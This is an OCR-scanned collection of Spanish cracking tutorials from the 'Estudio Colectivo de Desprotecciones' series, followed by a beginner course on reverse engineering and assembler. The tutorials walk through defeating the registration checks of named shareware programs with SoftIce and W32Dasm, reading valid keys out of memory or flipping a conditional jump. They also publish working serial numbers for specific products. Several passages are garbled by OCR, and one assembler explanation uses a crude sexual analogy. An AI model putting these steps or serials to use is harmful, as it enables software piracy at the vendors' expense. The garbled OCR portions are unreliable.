"Registration Complete” ;-) 

En mi caso me han salido los códigos 5447213 (Font Look 3.2), 2618572 
(DirectoryPrinter 1.8), AG3158NK (SuperTextSearch 1.6) 

Me parece que también deben ser válidos en otros Pes....;-) 


O 
Va 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


progrAmA Primasoft Internet Organizer 3.1 W95 
| DESCripCión [Organizador de direcciones de Internet. 
E 
| protECCión [Límite de 30 días de uso, con opción para registrarse. 
| DiFiCultAD — [1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
aminas a 
ak MBR 
era ade 


Wen 


Introducción 


La versión de evaluación tiene un límite de 30 días. 
Para registrarse, hay que introducir un nombre y una clave. 


El objetivo será generar un número de registro válido. (por si te lo instalaste hace 
más de 30 días, y no tuviste tiempo de evaluarlo. ;-) 


VA 


Al Atake 


A través del Astalavista encontré una par de códigos, pero que a mi no me 
funcionaron. Son estos : 

Name: JUANDA Serial: 987723779-065 

Name: PC98 Serial: 987722793 


Así que intenté mirármelo con el Softlce 3.22, pero no conseguí nada probando 
con BPX messageboxa, BPX getwindowtexta, BPX getdlgitemtexta, ni con BMSG 
Hwnd wm_gettext ;-(Sólo algunos cuelgues...;-) 


Entonces probé con el WDasm 8.9, y después de un rato de desensamblaje, a través 
de String References encontré sólo una dirección para "Registration not accepted". 
Puse unos BreakPoints por ahí, y mirando por la memoria [ebx+...] ví un número 
muy sospechoso... ;-) 

Probé de registrarme con él, y me funcionó correctamente : 

Name: ECD eval Serial: 988412812-065 


Debido a que a mi no me funcionaron los serials de Juanda y PC98, me temo que 
tampoco el de ECD eval, va a funcionar en otros Pes. 

El número de serie hace pinta de estar relacionado con alguna fecha, por lo que 
creo que no hay un número de serie genérico válido para cualquier Pc. 

[ Nota : ...Ejem, me he colado... ;-DDD Me han confirmado (gracias Sergio ;-) que 
el número sí vale en otros Pes... ;-!) 

Así pues, dependía de la versión, y no de la fecha como había mal-pensado 
inicialmente. ] 


Al registrarme, ya no tengo las opciones de Register, con lo cual no puedo repasar 
más detalladamente los pasos que he dado. ;-( 

Uno de los BreakPoints estaba en :49803C je 49805C, y creo que miré en la 
memoria a partir de ebx+unos cuantos bytes. (no sé bién cuantos, pero como el 
número de serie canta como una almeja además de estar por duplicado, ya lo 
encontraréis... ;-) 


- 
Vi 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


E - 
Whiskey Kon Tekila 


progrAmA Submission Wizard 4 W95 


| DESCripCión Programa para Promoción de páginas web. 

tipo Shareware 

| protECCión Límite de 30 días de uso, con opción para registrarse. 

[ DiFiCultAD 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
| hErrAmiEntAs — [Softlce 3.22 

| CrACKkEr | Mr.Brown 

[FECHA [uliode1998 


Introducción 


Hay una opción para registrarse, en donde hay que introducir sólo la clave, pero no 
ningún nombre. 

Pero la clave debe calcularla en función de "algo"(normalmente es el nombre), lo 
cual no he rastreado. O puede ser algún valor del registro, ..... 


El objetivo será conseguir una clave válida que nos permita registrarnos 
correctamente. 


De todas maneras, por el tipo de programa que es (da de alta webs en buscadores), 
puede que los fabricantes de este software hagan algún tipo de comprobación al 
conectar con ellos. 

Tan sólo, que lo sepas, y tu sabrás si corres el riesgo... ;-) 


Por mi parte, me interesaba esta desprotección ya que el programa está hecho en 
Visual Basic 5, y tenía curiosidad en ver como se podía hacer, ya que estos pgms 
se basan en las llamadas a la DLL del V.Basic, lo que los hace más engorrosos de 
seguir. 


Al Atake 


Arrancar el Pc con el SoftIce 3.22, con el fichero WinIce.Dat debidamente 
configurado. (Ver "Introducción al Softlce” en la sección de Documentos 
Genéricos para más información) 


Por ser un programa de V.Basic5, debemos tener también en el WinIce.Dat : 
EXP=cAwindowslsystemimsvbvm050.dll 

(Ver "Visual Basic3 con Softlce" en la sección de Documentos Genéricos para más 
información) 


La idea es tan simple que no tenía muy claro si funcionaría, pero ha ido bién. ;- 
DDD 


Si después de introducir una clave, nos dice si es correcta o no, entonces es que la 
compara con algún otro valor. 

Si podemos ver los dos valores que compara, y uno es la clave que nosotros hemos 
escrito, pues el otro es la clave correcta. 

Si no encontraramos nuestra clave, sería porque ha sido encriptada, pero no es el 
caso para este programa. 


Así pues, nos interesa interceptar el programa en cuanto haga esa comprobación de 
la clave. (PeroGrullo Rulez ;-) 

Lo primero que se me ocurre después de echarle un vistazo a las funciones de 
msvbvm50.dll, es probar con un BreakPoint para __vbaStrCmp 


O sea, pasito a pasito tenemos : 

Ejecutamos el Submission Wizard, vamos a la pantalla de registro y ponemos una 
clave cualquiera (Ej:-ECD IntroCracking) 

Ctrl+D para ir al Softlce, y ponemos el BreakPoint con BPX __ vbastremp (ojo, 
que hay dos subrallados delante de vba) 

Ctrl+D para volver al Submission W., y le damos al botón "Save Registration 


" 


Key". 


Ok, el BPX hace efecto, y nos hallamos en el código de la msvbvm50.dll. 
Con Fl2 se llega al código del SubWiz4w, en 137:48F5A9 

Unas linias más arriba hay unos push con los parámetros para llamar a 

_ vbaStrCmp. 


0137:0048F59B mov ebx, [MSVBVM50!__vbasStrCmpl 
0137:0048F5A1 push eax 

0137:0048F5A2 push 43ADE8 

0137:0048F5A7 call ebx 


Así que pongo un BreakPoint antes de que se produzca la llamada a la función que 


compara. 
(doble click en 137:48F59B, o BPX 137:48F59B) 
El BreakPoint anterior ya se puede desactivar (BD 0) si todavía no lo habéis hecho. 


Ctrl+D para seguir la ejecución del programa, y nos dice que registration invalid, 
Como ya tenemos puesto un BreakPoint, le volvemos a dar al botón "Save 
Registration Key". 


Estaremos en el Softlce en :48F59B, y ahora sí localizamos facilmente los valores 
a comparar. 

Uno está en EAX, y el otro en 43ADES. (Antes también los hubieramos podido 
encontrar, pero así se ve más claro). 

Con D EAX vemos la primera cadena. Son los 2 primeros caracteres de la clave 
que hemos puesto. 

Mientras que con D 43ADE3 vemos los 2 primeros con los que compara. 
(Mimmmm ;-) 


Como somos un poco mal pensados, apuntamos en un papel las letras que se ven 
en :43ADE8 

En mi caso hay 9 letras(todas en mayúsculas) separadas por puntos(.) repartidas 
desde :43ADES hasta :43AE17 

Quitamos los BreakPoints (BD *), y seguimos ejecutando (G). 


Otra vez en la pantalla de Registro, aunque esta vez ya será la última. ;-) 
Ponemos la clave que nos hemos apuntado, y nos dirá "Thank you for 
registering....” 


Como supongo que la clave debe variar según el ordenador, no creo que sirva de 
nada que dé la que a mi me ha salido. 
Así pues si estás interesado, recuerda aquello de ...."El movimiento se demuestra 


andando” ;-) 
VI 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


progrAmA CSE 3310 HTML Validator v2.55 W95 


Wen 


Introducción 


Los usuarios no registrados sólo pueden validar 150 documentos html. 


El objetivo será conseguir un número de registro para no tener limitaciones en el 
programa. 


Para ello interceptaremos la ejecución en el momento en que el pgm coja nuestra 
clave, y investigaremos qué hace con ella. 

Como veremos, compara la nuestra con la que él calcula. 

Así pues, miramos la suya, y esa será la nuestra ;-) 


Vi 


Al Atake 


Arrancar el Pc con el Softlce 3.22, con el fichero WinIce.Dat debidamente 
configurado. (Ver "Introducción al Softlce” en la sección de Documentoz 
Genéricoz para más información) 


Ejecutar el programa Html Validator, y seleccionar la opción para registrarse. 
Introducir cualquier nombre en Registration Name (Ej:ECD IntroCracking) 
Introducir cualquier clave en Registration Key (Ej:222333) 


Pulsar Ctrl+D para ir al Softlce. 


Una de las maneras en que el programa lee la información que hemos tecleado, es 
con GetWindowTextA o con GetDlgltemTextA (lo de la A al final es para los 
programas 32 bits) 

Así que vamos a poner un par de BreakPoints para estas instrucciones : 


BPX getwindowtexta 
BPX getdlgitemtexta 


Pulsamos Ctrl+D para volver al HTML Validator, y le damos al botón OK. 


Apareceremos en el Softlce, después de 0137:41771F call 
User32!GetDlgltemTextA 

Antes de llamar a esta función, se ha tenido que especificar una dirección de 
memoria en donde almacenar el valor. 4 linias más arriba, vemos una referencia a 
[EBP-200] (o [EBP+FFFFFE0O] que es lo mismo) 


Así pues, si miramos esa dirección con D EBP-200 ,veremos "ECD IntroCracking" 


5-) 


Avanzamos un poco con Fl0, hasta la siguiente llamada a GetDlgltemTextA. 
Igual que antes, veamos lo que ha quedado guardado con D EBP-400 (o 
[EBP+FFFFFCOO)), y encontramos la clave que habíamos puesto "222333" ;-) 


Seguimos avanzando un poco más, hasta llegar a 137:4177B 1 lea 
edx,[EBP+FFFFFA00O] 

Por el camino hemos dejado algunas verificaciones, como que la clave tenga más 
de 5 letras y menos de 80,... 


Si miramos que hay en [EBP-600] (o [EBP+FFFFFA0O]), podremos ver 
"TgfKRsi6sKPN" ;-DD 
Lo apuntamos en un papel, y dejamos que siga ejecutándose el programa. 


En mi caso se me quedó el Pc bloqueado, pero después de reiniciar, volví al Html 
Validator, y en la pantalla de Registro puse el mismo nombre que anteriormente, y 
la clave que me apunté en un papel. 


Registration Complete. ;-)) 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


[Programa [Quick Healy5.20. | 95/98 /WNT 
e A 
O A 

Url MA 


Introduccion 


Ponemos un numero cualquiera,control-d y nos salta el softice,bpx getdlgitemtexta 
pa' probar y x, volvemos al programa,le damos ok y nos salta de nuevo el soft,un £12 
y estamos en la rutina del programa,a partir de ahi podemos seguir dos caminos, 
analizar minuciosamente y ver como se comporta el codigo(útil sí queremos un 
KeyGen.),o probamos darle fanaticamente £10 hasta que nos aparezca el mensaje de 
"error en el codigo" o algo por el estilo. 


Para no complicarnos demasiado(y porque tambien soy bastante nuevo para un 
keygen),probemos nuestra suerte con la segunda opcion. 

Le damos f10 19 veces, y a la 20 nos aparece la ventana "incorrect unlock code", le 
damos aceptar y aparecemos en: 


:00408D27 6880134400 push 00441380 
* Possible StringData Ref from Data Obj ->"Incorrect unlock code." 


:00408D2C 6818244400 push 00442418 
:00408D31 ES24D30100 call 00426054 


* Possible Reference to Dialog: DialoglD_0066, CONTROL_ID:0458, "" 
| 

:00408D36 6858040000 push 00000458 "AQUI APARECEMOS" 
:00408D3B 8BCE mov ecx, esi 

:00408D3D E8C7580100 call 0041E609 

:00408D42 85CO0 test eax, eax 

:00408D44 7504 ¡ne 00408D4A 

:00408D46 33C0 xor eax, eax 

:00408D48 EB03 ¡mp 00408D4D 


El call inmediatamente arriba de donde aparecimos fue el que provocó el mensaje, 
por lo tanto, 

busquemos un poco arriba para ver q' tenemos(hay q' buscar algun salto 
condicional). 


:00408CBO 50 push eax 

:00408CB1 51 push ecx 

:00408CB2 ES6ECDFFFF call 00405425 
:00408CB7 83C408 add esp, 00000008 
:00408CBA 83F801 cmp eax, 00000001 
:00408CBD 7564 ¡ne 00408D23 "LA CLAVE" 
:00408CBF E833CEFFFF call 00405AF7 
:00408CC4 E8438EFFFF call 00401B0C 
:00408CC9 663D0200 cmp ax, 0002 
:00408CCD 7549 ¡ne 00408D18 
:00408CCF EF761C push [esi+1C] 


No necesitamos ir muy lejos y nos encontramos un jnz 00408d18 y un poco mas 
arriba ¡nz 00408d23,ahora bien, esto no nos dice nada por si solo, 

asi que analicemos un poco.Si nos fijamos en ¡nz 00408d23(en w32dasm jne) nos 
damos cuenta de que en caso de hacer el salto apareceriamos unas cuantas 
instrucciones antes de nuestro famoso call q' produce el mensaje de 
error,exactamente en: 


:00408D21 EB31 ¡mp 00408D34 


:00408D23 6A30 push 00000030 "AQUI" 
:00408D25 8BCE mov ecx, esi 


* Possible StringData Ref from Data Obj ->"Error" 


| 
:00408D27 6880134400 push 00441380 


* Possible StringData Ref from Data Obj ->"Incorrect unlock code." 
| 

:00408D2C 6818244400 push 00442418 

:00408D31 E824D30100 call 0042605A "NUESTRO MARTIRIO" 


Tambien podemos notar que inmediatamente arriba de push 30 esta un ¡mp que 
evitaria pasar por el call "de los lamentos". 

por lo que a simple vista pareceria ser que nuestro 00408cbd ¡nz 00408d23 seria lo q 
distingue de estar o no registrados.Pero antes de sacar conclusiones a la 
ligera,probemos. 

Ponemos un bc*, y luego un bpx en 00408cbd,le damos control-d,le damos ok de 
nuevo a nuestra ventana de Registro y nos baramos en el bpx que hemos puesto. 
Vemos que realmente va a saltar,como suponiamos,asi q' probemos,total no 
perdemos nada (creo).En le softice le damos r fl z y se convierte "magicamente” en 
un "no jump". 

Ok el momento de la verdad, le damos be*, y luego x, y pam!!!, un lindo mensaje... 
"Quick Heal has been upgrade to a complete..."No sweat.Ni siquiera necesitamos 
parcharlo,solo un cambio en un salto en tiempo de ejecucion y listo. 

Esperando que les sirva de ayuda.Atte. Kolgado. 

PD:Esta es la manera mas facil y es genial para los nuevos,si se animan le pueden 
dar con el keygen. Gracias a todos los spanish reversers... 

FreeMind. 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


WKT Tutorialz Site 


Programa ToggleMouse 3.4.3 W95 / W98 / NT 
Descripción Programa que genera utilidades para el mouse. 
Tipo Trial de 45 dias 
Url ¡http://www.togglesoftware.com 
Protección Nag Screen. Time Limit 45 Dias, Serial. 
Dificultad 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
Herramientas W32dasm v8.9, UltraEdit v6.10a, Registry Monitor 
Objetivo. Simular estar registrados. 
Cracker Maniac PC 
Fecha 25 de Agosto de 1999 
OS 
Ve 


Introducción 


Este tutorial está creado por que realmente no me sentí muy satisfecho con los otros 
cursos que hice, realmente pienso .. no quedaron de mi agrado así que los eliminé y 
los reemplacé con estos,así que el que quedó leyendo mi otro curso, despídanse, 
empezaremos desde 0 ... este tutorial está hecho especialmente para los que no 
entienden lo que es la Ingeniería Inversa, desde ahora le llamaremos cracking espero 
poder ayudarlos en todo lo que pueda, y si no, haré lo mejor ... 


La ingeniería inversa se basa en quitar, remover, suspender uno o más temas de 
protección de alguna aplicación ya siendo comercial y otras. Muchos consideran esto 
como un arte. En este curso pienso ayudar a personas quén interesadas al respecto, y 
incluso a los mismos programadores. Se les enseñará a no ser tan 'cuadrados' de 
mente pensando en intereses comerciales, se les enseñará a crackear sus propios 
programas, e ir aumentando sus niveles de protección, en este primer curso 
aprenderemos algo mínimo en cuanto a reventar protecciones de programas, mas que 
nada, hablaremos de teórico. 


Por hoy se aprenderá el uso de la ingeniería inversa bajo el sistema operativo en 
Windows 95 y/o 98. Empezaremos por cosas muy básicas. Sólo les pediré las 
siguientes cosas para que comienzen a crackear : 


Un Computador -=(Mayor o igual a 16 Mb. de RAM, mayor de 486 a 33) 
Un disco duro de 1 Gb. 

UN CEREBRO 

Instinto y perspicacia. 


e Las ganas. 

e Algo de conocimientos básicos a medios (Como que es la RAM, programar, uso 
de Win95) 

e Sies posible, algo de conocimientos de ensamblador, si es que no es así, los 
ayudaré en lo que pueda. 

e Paciencia! 


Yo creo que tienes los dos primero ítems, ya que ahora solo salen pentiums II! y 
pocaso los Il... Al mismo tiempo aprenderemos a crackear a conocer los aspectos de 
una PC, cómo funciona, qué hace, y como es que se ejecutan las cosas. Creo que 
debo explicarles otras cosas también pero las aprenderemos en el transcurso de estos 
laaargoos capítulos. 


Konceptos 


Empezaremos por pensar en qué es un sistema operativo, es la base por la cuál un 
programa (en este caso Windows 9x) domina el inicio de las rutinas para procesar 
datos en el disco duro. (suena enredado, pero piensa que se trata de un programa 
que hace que se 'inicie' el disco duro ..) .. ya sabemos cuál programa está dominando 
en tu equipo, si es que usas una apple macintosh, busca en altavista 'MAC CRACK', y 
encontrarás hechos al respecto. Muy bien, imaginemos un programa a crackear, o 
sea, ¿Qué queremos hacerle al crackearlo? .. vamos a eliminar diálogos o partes que 
digan .. 'Cómprame' .. 'gasta dinero' ... por un programa que usas, y por ejemplo, un 
programa que usas te pide que lo compres utilizando una tarjeta de crédito (p.e. 
MasterCard*Visa), y que lo compres por ejemplo en http: //www.buynow.com , del 
cuál te pedirá el nombre, número de tarjeta de crédito y cuando expira, así harán una 
cybercompra arrugando tus bolsillos ... ¿No? ... si no te ha pasado revisa entre tus 
cosas esos CD's de revistas .. verás mucho material para crackear allí, todavía no 
sabes crackear, así que aprenderemos aquí. Imagina que este programa tiene un 
cuadro de diálogo que te pide un nombre y una contraseña, y esta contraseña se te 
da cuando compras el programa. y cuando la introduces en el programa, el programa 
te dirá "Gracias por registrarse" lo que prácticamente quiere decir que : "Gracias por 
gastar su dinero en este programa" .. nuestro objetivo para este y solamente este 
programa será estudiar el porque cuando introduces una contraseña errónea te dice 
"Contraseña incorrecta” ... y modificar esta sentencia o ver como es que forma la 
contraseña ... llamaremos desde ahora a MS-DOS ->DOS, a Windows 95 le 
llamaremos ->Win95. ¿Por qué digo solamente para este programa? .. pues 
existen varias protecciones distintas, como las de tiempo (cuánto tiempo usas un 
programa) .. las de usos (Cuánto puedes usar un programa, p.e. 6 veces)... y otras 
por allí ... 


Cada vez los programadores están desarrollando peores protecciones para los 
programas... y a veces son buenas... (no demasiado y pocas veces).. esto ocurre 
cuando los programadores crean los programas en pensamientos comerciales y 
'monetarios' .. y lo peor de todo es cuando esto sucede gracias a la estúpida sociedad 
en que vivimos donde la gente esta propensa a que cuando se tiene dinero, no se 
hacen las cosas por placer. se hacen con mentes comerciales. 


Este curso es totalmente susceptible a cambios 


¿Por donde rayos Komenzar? 


Empezaremos por saber que rayos necesitaremos para esto de la ingeniería inversa. 
Pueden ser encontrados en HERRAMIENTAS 


Depurador/ Debugger: Es un programa que sirve para "depurar" programas, me 
explico, cuando se ejecuta un programa y lo 'depuras' .. Te vas deteniendo en cada 
paso que ejecuta el programa, al mismo tiempo cuando lo depuras por ejemplo en el 
programa llamado "soft-ice", este es un programa para depurar (el más famoso) vas 
viendo el programa depurándose en ensamblador o mas bien conocido como 
assembler, explicaré assembler básico más adelante ... 


Lista de depuradores mas comunes : Debug (De MS-Dos), Soft-Ice (El más usado), TR 
(para dos y Win) 


Editor Hexadecimal: Es un programa que permite 'editar' archivos, en forma 
hexadecimal y poder cambiar bytes en él, mas adelante aprenderemos el sistema 
hexadecimal y binario. 


Lista de editores hexadecimales más comunes : Hex Workshop (Win95), Ultraedit 
(Win95), Hacker's View (Dos) 


Monitor del registro: Para ocasiones en que los programas guarden sus datos de 
registro en el sistema de Windows, siempre servirá este programa .. más adelante se 
explicará acerca de este famoso registro de 'windows!.. 


Lista de monitor : Registry monitor (Win95). 


Descompresor: Algunos programas. Más en sí sus ejecutables, vienen comprimidos 
con ejecutables de otras compañías , por ejemplo el famoso |conForge, este programa 
no permite ser desensamblado... Existe un programa llamado shrink, que protege los 
ejecutables (EXE), con este puedes usar por ejemplo el Deshrink, que descomprime 
los archivos protegidos con Shrink.. Y así es posible desensamblar y modificar algunos 
segmentos... Creo que todavía ya los estoy confundiendo . 


Lista de descompresores comunes : Deshrink, PeUNLOCK, etc. miles más ... 


Monitor de archivos: Algunos programas crean archivos temporales con los registros 
correctos, y cuando se vuelven a ejecutar los programas, verifican la información del 
archivo temporal y si es que no es correcta se borra, el monitor de archivos ve los 
archivos que se crean ... (p.e. UltraEdit, este pide un número de registro, y para 
comprobar nos dice que necesita reiniciar para comprobar, este crea un archivo 
llamado uedit.reg). 


Lista de monitor : File Monitor. 


Desensamblador (Disassembler): Podemos depurar un programa en el instante, 
pero también podemos desensamblar un programa, o sea, ver lo depurado en el 
instante, pero tranquilamente podemos estudiar las rutinas sin tener que depurar 'En 
el momento.. 


Lista de monitor : IDA (Dos*32 Bits), WDasm, Sourcer 7, etc. ... 


> 
Ve 


Konocimientos básikos de ensamblador (assembler) 


Primero : ¿ Por que digo desensamblar o depurar? .. cuando un programa está hecho 
en otros lenguajes de programación (p.e. € - C++, Visual Basic, Delphi, Pascal) y lo 
'compilas'.. o sea, lo dejas en ejecutable(.EXE, .COM) primero, ¿Qué es compilar?, 
hablemos superficialmente de aquello.. imaginemos que tenemos un código fuente de 
un programa (supongo que sabes que es eso), y el programa tiene la función de hacer 
lo siguiente ... Muestrame Un mensaje, el mensaje dice 'Hola a todos', y 
cuando lo muestres, que suene un pitído, al mismo tiempo, pinta las letras de 
color verde. Este es un pequeño programa que puede ser hecho en varios lenguajes, 
pero .. ¿El computador puede entender estas letras humanas y este lenguaje que 
nosotros entendemos? NO!, para eso necesitaremos un compilador, este transforma 
este código en un lenguaje llamado 'máquina', que convierte nuestro programita en 
un .EXE que el procesador sabrá ejecutar, y entonces, tendremos un programa. Al 
mismo tiempo estamos protegiendo nuestro código, ¿Por que?, por que si le damos el 
código a cualquiera, pueden modificarlo ¿o no?.. por ejemplo si tengo el código de 
arriba puedo modificarlo para que sea así: 


Muestrame Un mensaje, el mensaje dice 'MUERANSE TODOS"', y cuando lo 
muestres, que suenen dos pitídos, al mismo tiempo, pinta las letras de color 
azul. 


Claro que ahora están saliendo descompiladores. que revierten el ejecutable a el 
código fuentee. Para variar me volví a desviar, quedamos en qué era un 
desensamblador, bueno, cuando creamos un programa en Delphi, Pascal, Etc. lo 
compilados, el desensablador puede 'desensamblar' el program para dejarlo en 


Ensamblador para la ingeniería inversa. 


Ensamblador es un lenguaje de programación de bajo nivel, ¿ Qué significa bajo nivel 
?... pues al revés de un lenguaje avanzado como 'C', o uno medio como Pascal que 
son lenguajes para crear programas.. que son de alto nivel.. el lenguaje de bajo nivel 
es una manera de decir que mientras 'Mas programemos o más programa creemos 
menos control tendremos de este..'. 


Este lenguaje les va ayudar mucho ... Si prestamos atención a este pequeño código 
fuente, no lo entenderán si no saben acerca de ensamblador.. si es que es así . Les 
ayudaré con los tipos ... 


MOV AX,1111h 
MOV BX,1112h 
CMP AX,BX 
JB saltobueno 
HLT 
saltobueno: 
DEC BX 

CMP AX,BX 
JNE Acaba 

JE Continua 
Continua: 

DEC BX 

CMP AX,BX 


JE Acaba 
JB Acaba 
JG Acaba 
Acaba: 
XOR AX,AX 
XOR BX,BX 


¿Que rayos significa esto? 


¿Estudiaremos todo lo que hace este pequeño texto, e iremos aprendiendo para seguir 
adelante en nuestro curso.. empezaremos por aprender que es ax y bx mostrados en 
la primera instrucción. Primero que nada, no son solo estás dos palabras, en total son 
las siguiente palabras : AX, BX, CX, DX ... pero .. ¿que son estás palabras? ... estas 
palabras son registros de datos, o sea, que contienen información en ellas para 
cálculos y otras cosas en general. Digamos que guardan datos temporales de la 
'memoria'. tocaremos de manera superficial este tema ya que está curso de aesoft 
que les puede ayudar al respecto muy meticulosamente. Pensemos que estos 
registros son para acumular datos en memoria temporalmente .. ¿Ok?.. pensemos 
ahora que un equipo estándar con Win95 Usa 32 Bits, los registros para 16 bits 
(Windows 3.11, piénsenlo así) son Ax, Bx, Cx, Dx.Pero si queremos trabajar en 32 
Bits, o sea Win95, tendremos que agregarles una E para depurarlos en Win95, (P.e. 
Eax, Ebx, Ecx, Edx).. Me Explico nuevamente, en windows 95 se usan datos de 32 
Bits(Para guardar datos)... si estamos trabajando en Windows 3.11 o dos(Versión 
anterior de Win95, y el añorado DOS) trabajaremos para guardar datos en 16 bits. Si 
trabajamos en DOS o en WIN 3.11, deberíamos ver los registros de datos como 
AX,BX,CX,DX, si trabajamos en Win95 serían así EAX,EBX,ECX,EDX. (Si ves en 
alguna parte registros de 16 bits. como AH no te sorprendas, es que se separan 
AX,BX,CX,DX .. ¿Cómo? .. AX se separa en AH y AL, BX se separa en BH y BL... y 
así sucesivamente.) Ahora imaginemos que tenemos estos registros, ¿cada uno debe 
tener un valor o no?.. claro, y para este segmento de un código fuente tenemos el 
comando mov, el cuál en inglés significa move, el cuál significa mover, o sea que 
'mueve' el valor 1111 a Ax, y mueve el valor 1112 A Bx, ¿Por qué la h? significa que 
está en hexadecimal, y tal como dijo Hot Byte en su curso, aprenderemos a 
transformar de decimal, hexadecimal, binario. 


Decimal a binario (Todo esta siguiente explicación gracias a Hot Byte): 


Decimal Binario 


110 
111 
1000 
1001 
1010 


OO X=]O0U AUNAR O 
pp 
o 
e 


pb 
o 


Aquí se presenta la conversión de binario decimal: 


5 tenemos el número 4 4 0 0 4 
q > 0 1 2 3 4 
La conversión sería : 1*2 1*%2 0*2 0*2 1*2 
y en decimal es : 1 +2 +0 +0 +16 = 19 


El * lo utilizo para multiplicar ... y el número pequeño, es elevar o potencionar (si no 
sabes, estas muerto).. ahora pongamos el primer número, 1*2, quedaría 2, si lo 
elevamos a O siempre y siempre quedará 1, cualquier número elevado a O 
siempre dará 1, además si te diste cuenta, dependiendo de los números que se van 
agregando en binario para que se vaya aumentando en 1 el exponente (0,1,2,3,4...). 
En este caso hemos logrado satisfactoriamente convertir el binario 11001 en del 
decimal 19. Otra cosa! debes tener claro que en la computación se usa para 
potencionar el signo '”'.. Sigamos ... Pero primero les aconsejaría tener una 
calculadora científica a mano: 


A continuación me apoyaré en el instituto de investigaciones de México para apoyar lo 
que voy a decir: 


La división de un número entre dos es objetiva, cuando se divide y queda entre comas 
el resultado(p.e.: 15,3), quedarán 'residuos',(15,3 <esto es residuo) si el residuo es 
mayor que O, será 1, si igual a O, será O. si esto se explica de la siguiente manera ... 


TOMEMOS EL NUMERO 43 COMO EJEMPLO : 


43/2 = El resultado es 21,5 .. 5 es mayor que 0, o sea que queda como 1 
21/2 = El resultado es 10,5 .. 5 es mayor que 0, o sea que queda como 1 
10/2 = El resultado es 5,0 ... O es igual a 0, o sea queda como O 

5/2 = El resultado es 2,5 ... 5 es mayor que 0, o sea queda como 1 

2/2 = El resultado es 1,0 ... O es igual a 0, o sea queda como O 

1/2 = El resultado es 0,5 ... 5 es mayor a 0, o sea queda como 1 

Vamos a tener que mirar este número de abajo hacia arriba, o sea 101011 


Conversiones a Hexadecimal 


Miremos la siguiente tabla para empezar a guiarnos un poco : 


Decimal Hexadecimal 
0 0 
1 1 
2 2 
3 3 
4 4 
5 5 
6 6 
7 7 
8 8 
9 9 
1 A 

11 B 
12 0 


13 D 


14 E 
15 F 
16 10 
17 11 
18 12 
19 13 
20 14 
21 15 
22 16 
23 17 
24 18 
25 19 
26 1A 
27 1B 


siguiente con lo dicho convertiremos de 
binario a hexadecimal. 


Un número binario (1-0) es un bit, ocho bits son 
un byte, 1.024 bytes es un kilobyte, 1.024 
kilobytes es 1 Megabyte, 1.024 Megabytes es un 
gigabyte... 


Volvamos a lo nuestro ; veamos nuevamente el código fuente : 


MOV AX 1111h Nuevamente sabemos que el registro AX vale 1111 en 
Hexadecimal, se pone una 'h' si es hexadecimal 


MOV BX,1112h  ; Ahora sabemos que BX vale 1112 en Hexadecimal. 
CMP AX,BX 


Ahora averiguaremos que es CMP, 'podríamos' decir que proviene de 'comprobar', primero 
comprueba el 2do valor con el primero, o sea, comprueba si es que BX es igual a AX. Y después 
de comprobar tenemos que saber qué queremos comprobar, si es menor, o mayor, o lo que sea, 
para esto utilizaremos el comando JB(abajo). 


JB saltobueno 


El comando JB es uno de varios saltos disponibles para operaciones .. o sea, que si tenemos 
que comprueba el valor de AX con BX .. ¿luego qué? .. es como decir que : mira, te subo el 
sueldo y después hago algo .. ¿pero qué? .. --mira, te subo el sueldo pero luego te despido-- se 
entiende? después de hacer alguna operación debemos darle una instrucción .. en este caso JB 
significa : salta si es inferior... en este caso veremos que si dejamos a AX con el valor de 1111 
y a BX con el valor de 1112, después los comprobamos y JB hará la comprobación de : Si AX es 
menor que BX, entonces salta a la instrucción SALTOBUENO que está abajo. Ojalá que 
hayas entendido esto .. mira la tabla que está mas abajo. 


HLT ; Esta orden bloquea el ordenador, halt > con esto decimos todo. 


; si te das cuenta, hemos puesto saltobueno: con ":' al final, para declarar que 


saltobueno: EE 
es una función. 


DEC BX 


DEC, ¿Qué es esto? .. viene de la palabra inglesa 'decrease', que significa decrementar o 
disminuir, y entonces disminuirá el valor BX (1112) en 1 y quedará 1111. Dec sirve para quitar 
solamente 1. 


CMP AX,BX ; Después de programar comprobará que Ax con BX ahora valen lo mismo 
JNE Acaba 


JE Continua 


Trataré de explicar, JNE es un salto también, JNE significa = Salta si no es equivalente, y JE es 
el contrario de JNE, o sea JE = Salta si es equivalente, dime.. ¿crees que la función JNE se va 
a ejecutar? .. piensa tu respuesta. 


Continua: 

DEC BX ; Ahora BX vale 1110h 

¿ Ahora te diste cuenta que disminuimos nuevamente a BX ? 
CMP AX,BX ; comprueba nuevamente a AX con BX 


JE Acaba 


JB Acaba 


JG Acaba 


JE = Salta si es equivalente, (Saltará? .. no ..) JB = Salta si es inferior,(No es menor, no 
saltará) JG = Salta si es mayor, en este caso, saltará.. AX es mayor que BX. 


Acaba: 


XOR AX,AX 


XOR BX,BX 
; AX y BX valen ahora cero. XOR torna los registros en 0. 


Si tomamos todo lo que decía toda la sentencia de este mini programa en ensamblador es como si 
se tomara esto : 


Ax = Javier - Bx = Federico (Bueno para el pic..), 


Javier tiene ahora (mov ax,1111h) 1111 Condones, y Federico tiene 1112(mov bx,1112h) 
Condones, para comprobarlo los cuentan(cmp ax,bx) y por que Javier tiene menos se van al 
prostíbulo(JB Saltobueno), y en el prostíbulo(saltobueno:), Federico se gasta uno (Dec bx), 
después nuevamente los cuentan (cmp ax,bx). Se dan cuenta que no están disparejos (JNE 
acaba) y que tienen los mismo, pero después se van al basurero municipal(JE continua), y 
Federico necesita solo 1110, así que bota uno (Dec bx). Los cuentan nuevamente (cmp ax,bx), 
después cuentan si tienen los mismos (JE acaba) y no tienen lo mismo. Después ven si Javier 
tiene menos(JB acaba), no, no tiene menos, después ven si Javier tiene más, si tiene más,(JG 
acaba), después se aburren, y los van a bota todos (acaba:) ... Javier los quema todos(XOR 
AX,AX), y Federico también (XOR BX,BX). 


Hexadecimal Assembler Significa 

75 0 0F85 jne Salta si no es equivalente 
74 0 0F84 je Salta si es equivalente 

EB jmp Salta directamente a... 

90 nop ( No OPeration ) Sin operación 
77 0 0F87 ja Salta si esta sobre 

OF86 jna Salta si no esta sobre 

0F83 jae Salta si esta sobre o igual 
